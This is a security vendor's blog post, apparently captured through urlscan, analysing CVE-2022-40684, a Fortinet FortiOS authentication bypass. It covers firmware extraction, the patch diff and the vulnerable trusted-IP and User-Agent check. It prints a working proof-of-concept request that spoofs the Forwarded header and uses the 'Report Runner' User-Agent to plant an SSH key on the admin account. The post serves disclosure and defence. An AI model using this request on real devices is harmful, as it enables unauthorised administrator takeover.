www.horizon3.ai
Open in
urlscan Pro
104.197.16.226
Public Scan
URL:
https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/
Submission: On March 10 via manual from GH — Scanned from DE
Submission: On March 10 via manual from GH — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
* NodeZero™
* What is NodeZero?
* Internal Pentesting
* External Pentesting
* Documentation
* FAQ
* Learn
* Year in Review 2022
* By Industry
* Healthcare
* Public Sector
* Attack Content
* Ransomware Impact
* Log4Shell
* Credential Attacks
* Security Controls
* Compliance In Security
* Effective Security
* For Splunk Logging
* Purple Team Culture
* Vulnerable ≠ Exploitable
* Customer Stories
* Blogs
* Customer Success
* Hack the Box
* Red Team
* Disclosures
* Videos
* Whitepapers
* About
* Our Vision
* The Team
* Join Our Team
* Contact Us
* Swag
* In the News
* Awards
* Events
* Partners
* Partners
* MSSPs and MSPs
* Partner Portal
* Log In
* Try NodeZero
* Demo
* Free Trial
Select Page
* NodeZero™
* What is NodeZero?
* Internal Pentesting
* External Pentesting
* Documentation
* FAQ
* Learn
* Year in Review 2022
* By Industry
* Healthcare
* Public Sector
* Attack Content
* Ransomware Impact
* Log4Shell
* Credential Attacks
* Security Controls
* Compliance In Security
* Effective Security
* For Splunk Logging
* Purple Team Culture
* Vulnerable ≠ Exploitable
* Customer Stories
* Blogs
* Customer Success
* Hack the Box
* Red Team
* Disclosures
* Videos
* Whitepapers
* About
* Our Vision
* The Team
* Join Our Team
* Contact Us
* Swag
* In the News
* Awards
* Events
* Partners
* Partners
* MSSPs and MSPs
* Partner Portal
* Log In
* Try NodeZero
* Demo
* Free Trial
FORTIOS, FORTIPROXY, AND FORTISWITCHMANAGER AUTHENTICATION BYPASS TECHNICAL DEEP
DIVE (CVE-2022-40684)
by James Horseman | Oct 13, 2022 | Blog, Red Team
INTRODUCTION
Fortinet recently patched a critical authentication bypass vulnerability in
their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684).
This vulnerability gives an attacker the ability to login as an administrator on
the affected system. To demonstrate the vulnerability in this writeup, we will
be using FortiOS version 7.2.1
POC
Let’s examine the inner workings of this vulnerability. You can find our POC
here. The vulnerability is used below to add an SSH key to the admin user,
enabling an attacker to SSH into the effected system as admin.
> PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent:
> Report Runner Content-Type: application/json Forwarded:
> for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 {
> “ssh-public-key1”: “\”ssh-rsa
> AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58=
> dev@devs-MacBook-Pro.local\”” }
DEEP DIVE
FortiOS exposes a management web portal that allows a user configure the system.
Additionally, a user can SSH into the system which exposes a locked down CLI
interface. Our first step after familiarizing ourselves with the system was to
diff the vulnerable firmware with the patched firmware.
FIRMWARE EXAMINATION
We obtained a VMware zip file of the firmware which contained two vmdk files.
First, we examined the vmdk files with virt-filesystems and mounted them with
guestmount:
$>ls *.vmdk
datadrive.vmdk fortios.vmdk
$>sudo virt-filesystems --filesystems -a fortios.vmdk
/dev/sda1
$>sudo mkdir fortios_mount
$>sudo guestmount -a fortios.vmdk -m /dev/sda1 --ro fortios_mount
$>cd fortios_mount
$>ls
boot.msg datafs.tar.gz extlinux.conf filechecksum flatkc flatkc.chk ldlinux.c32 ldlinux.sys lost+found rootfs.gz rootfs.gz.chk
Next, we extract the root filesystem where we find a hand full of .tar.xz files:
$>sudo cp ../fortios_mount/rootfs.gz .
$>gunzip rootfs.gz
$>cpio -i 2> /dev/null < rootfs
$>ls
bin.tar.xz bin.tar.xz.chk boot data data2 dev etc fortidev init lib lib64 migadmin.tar.xz node-scripts.tar.xz proc rootfs sbin sys tmp usr usr.tar.xz usr.tar.xz.chk var
Interestingly, attempting to decompress the xz files fail with corruption
errors:
$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt
Its unclear if this is an attempt at obfuscation, but we find a version of xz in
the sbin folder of the firmware. We can’t run it as is, but we can patch its
linker to point to our system linker to finally decompress the files:
$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt
$>find . -name xz
./sbin/xz
$>./sbin/xz --decompress *.xz
bash: ./sbin/xz: No such file or directory
$>file ./sbin/xz
./sbin/xz: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /fortidev/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eef5d20a9f8760df951ed122a5faf4de86a7128a, for GNU/Linux 3.2.0, stripped
$>patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz
$>./sbin/xz --decompress *.xz
$>ls *.tar
bin.tar migadmin.tar node-scripts.tar usr.tar
Next, we untar the files and begin examining their contents. We find /bin
contains a large collection of binaries, many of which are symlinks to
/bin/init. The migadmin folder appears to contain the frontend web code for the
administrative interface. The node-scripts folder appears to contain a NodeJs
backend for the administrative interface. Lastly, the usr folder contains a
libaries folder and an apache2 configuration folder.
THE PATCH
We apply the same steps to firmware version 7.2.2 to enable diffing of the
filesystems. In the bin folder, we find the large init binary has changed and in
the node-scripts folder we find the index.js file has changed:
index.js diff
This diff shows that the httpsd proxy handler explicitly sets the forwarded,
x-forwarded-vdom, and x-forwarded-cert headers. This gives us a hint as to where
to start looking for clues on how to exploit this vulnerability.
HTTPSD AND APACHE HANDLERS
After some searching, we discover that the init binary we mentioned earlier
contains some strings matching the headers in the NodeJs diff. This init binary
is rather large and appears to have a lot of functionality including Apache
hooks and handlers for various management REST API endpoints. To aid in our
research, we SSH’d into the system and enabled debug output for the httpsd
process:
fortios_7_2_1 # diagnose debug enable
fortios_7_2_1 # diagnose debug application httpsd -1
Debug messages will be on for 5 minutes.
fortios_7_2_1 # diagnose debug cli 8
Debug messages will be on for 5 minutes.
While investigating the forwarded header, we find an apache access_check_ex hook
that parses the header, extracts the for and by fields, and attaches them to the
Apache request_rec structure. You can see that the for field allows us to set
the client_ip field on the request record’s connection.
forwarded header parsing
Additionally, we see a log message that mentioned which handler is used for a
particular request.
[httpsd 12478 - 1665412044 info] fweb_debug_init[412] -- Handler "api_cmdb_v2-handler" assigned to request
After searching for the handler string, we find an array of handlers in the init
binary:
hander array
After investigating some of the handlers, we find that many of them make a call
to a function we named api_check_access:
api_check_access
We were immediately drawn to api_check_access_for_trusted_source which first
checks if the vdom socket option is trusted, but then falls through to a
function we called is_trusted_ip_and_user_agent.
is_trusted_ip_and_user_agent
You can see that this function checks that the client_ip is “127.0.01” and that
the User-Agent header matches the second parameter. This function gets called
with two possible parameters: “Node.js” and “Report Runner”. The “Node.js” path
seems to perform some additional validation, but using “Report Runner” allows us
to bypass authentication and perform API requests!
WEAPONIZATION
The ability to make unauthenticated request to the the REST API is extremely
powerful. However, we noticed that we could not add or change the password for
the admin user. To get around this we updated the admin users SSH-keys to allow
us to SSH to the target as admin. See our original announcement.
SUMMARY
To wrap things up here is an overview of the necessary conditions of a request
for exploiting this vulnerabilty:
1. Using the Fowarded header an attacker is able to set the client_ip to
“127.0.0.1”.
2. The “trusted access” authentication check verifies that the client_ip is
“127.0.0.1” and the User-Agent is “Report Runner” both of which are under
attacker control.
Any HTTP requests to the management interface of the system that match the
conditions above should be cause for concern. An attacker can use this
vulnerability to do just about anything they want to the vulnerable system. This
includes changing network configurations, adding new users, and initiating
packet captures. Note that this is not the only way to exploit this
vulnerability and there may be other sets of conditions that work. For instance,
a modified version of this exploit uses the User-Agent “Node.js”. This exploit
seems to follow a trend among recently discovered enterprise software
vulnerabilities where HTTP headers are improperly validated or overly trusted.
We have seen this in recent F5 and VMware vulnerabilities.
HOW CAN NODEZERO HELP YOU?
Let our experts walk you through a demonstration of NodeZero, so you can see how
to put it to work for your company.
Schedule a Demo
info@horizon3.ai • 650-445-4457
Contact Us
FOLLOW US
RECENT POSTS
* From CVE-2022-33679 to Unauthenticated Kerberoasting
2 weeks ago
* Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs
2 weeks ago
SUBSCRIBE TO COMMUNITY UPDATES
© 2022 All Rights Reserved. | Privacy Policy | Support Policy | Terms
and Subscriptions
We use cookies on our website to give you the most relevant experience by
remembering your preferences and repeat visits. By clicking “Accept All”, you
consent to the use of ALL the cookies. However, you may visit "Cookie Settings"
to provide a controlled consent.
Cookie SettingsAccept All
Manage consent
Close
PRIVACY OVERVIEW
This website uses cookies to improve your experience while you navigate through
the website. Out of these, the cookies that are categorized as necessary are
stored on your browser as they are essential for the working of basic
functionalities of the ...
Necessary
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly.
These cookies ensure basic functionalities and security features of the website,
anonymously.
CookieDurationDescription__cfruidsessionCloudflare sets this cookie to identify
trusted web traffic._GRECAPTCHA5 months 27 daysThis cookie is set by the Google
recaptcha service to identify bots to protect the website against malicious spam
attacks.cookielawinfo-checkbox-advertisement1 yearSet by the GDPR Cookie Consent
plugin, this cookie is used to record the user consent for the cookies in the
"Advertisement" category .cookielawinfo-checkbox-analytics11 monthsThis cookie
is set by GDPR Cookie Consent plugin. The cookie is used to store the user
consent for the cookies in the category
"Analytics".cookielawinfo-checkbox-functional11 monthsThe cookie is set by GDPR
cookie consent to record the user consent for the cookies in the category
"Functional".cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR
Cookie Consent plugin. The cookies is used to store the user consent for the
cookies in the category "Necessary".cookielawinfo-checkbox-others11 monthsThis
cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the
user consent for the cookies in the category
"Other.cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR
Cookie Consent plugin. The cookie is used to store the user consent for the
cookies in the category "Performance".CookieLawInfoConsent1 yearRecords the
default button state of the corresponding category & the status of CCPA. It
works only in coordination with the primary cookie.OptanonConsent1 yearOneTrust
sets this cookie to store details about the site's cookie category and check
whether visitors have given or withdrawn consent from the use of each
category.viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie
Consent plugin and is used to store whether or not user has consented to the use
of cookies. It does not store any personal data.
Functional
Functional
Functional cookies help to perform certain functionalities like sharing the
content of the website on social media platforms, collect feedbacks, and other
third-party features.
CookieDurationDescriptionAnalyticsSyncHistory1 monthLinkedIn - Used to store
information about the time a sync took place with the lms_analytics
cookiebcookie2 yearsLinkedIn sets this cookie from LinkedIn share buttons and ad
tags to recognize browser ID.bscookie2 yearsLinkedIn sets this cookie to store
performed actions on the website.langsessionLinkedIn sets this cookie to
remember a user's language setting.li_gc2 yearsLInkedIn Used to store consent of
guests regarding the use of cookies for non-essential purposeslidc1 dayLinkedIn
sets the lidc cookie to facilitate data center selection.UserMatchHistory1
monthLinkedIn sets this cookie for LinkedIn Ads ID syncing.
Performance
Performance
Performance cookies are used to understand and analyze the key performance
indexes of the website which helps in delivering a better user experience for
the visitors.
CookieDurationDescription_calendly_session21 daysCalendly, a Meeting Schedulers,
sets this cookie to allow the meeting scheduler to function within the website
and to add events into the visitor’s calendar.
Analytics
Analytics
Analytical cookies are used to understand how visitors interact with the
website. These cookies help provide information on metrics the number of
visitors, bounce rate, traffic source, etc.
CookieDurationDescription_ga2 yearsThe _ga cookie, installed by Google
Analytics, calculates visitor, session and campaign data and also keeps track of
site usage for the site's analytics report. The cookie stores information
anonymously and assigns a randomly generated number to recognize unique
visitors._ga_V462VSRXXS2 yearsThis cookie is installed by Google
Analytics.6suuid2 years6sense is a B2B predictive intelligence engine for
marketing and sales.CONSENT2 yearsYouTube sets this cookie via embedded
youtube-videos and registers anonymous statistical data.pardotpastThe pardot
cookie is set while the visitor is logged in as a Pardot user. The cookie
indicates an active session and is not used for tracking.visitorId1
yearSalesforce
Advertisement
Advertisement
Advertisement cookies are used to provide visitors with relevant ads and
marketing campaigns. These cookies track visitors across websites and collect
information to provide customized ads.
CookieDurationDescriptionVISITOR_INFO1_LIVE5 months 27 daysA cookie set by
YouTube to measure bandwidth that determines whether the user gets the new or
old player interface.YSCsessionYSC cookie is set by Youtube and is used to track
the views of embedded videos on Youtube pages.yt.innertube::nextIdneverThis
cookie, set by YouTube, registers a unique ID to store data on what videos from
YouTube the user has seen.yt.innertube::requestsneverThis cookie, set by
YouTube, registers a unique ID to store data on what videos from YouTube the
user has seen.
Others
Others
Other uncategorized cookies are those that are being analyzed and have not been
classified into a category as yet.
CookieDurationDescriptionlpv97107330 minutesNo description
SAVE & ACCEPT
Powered by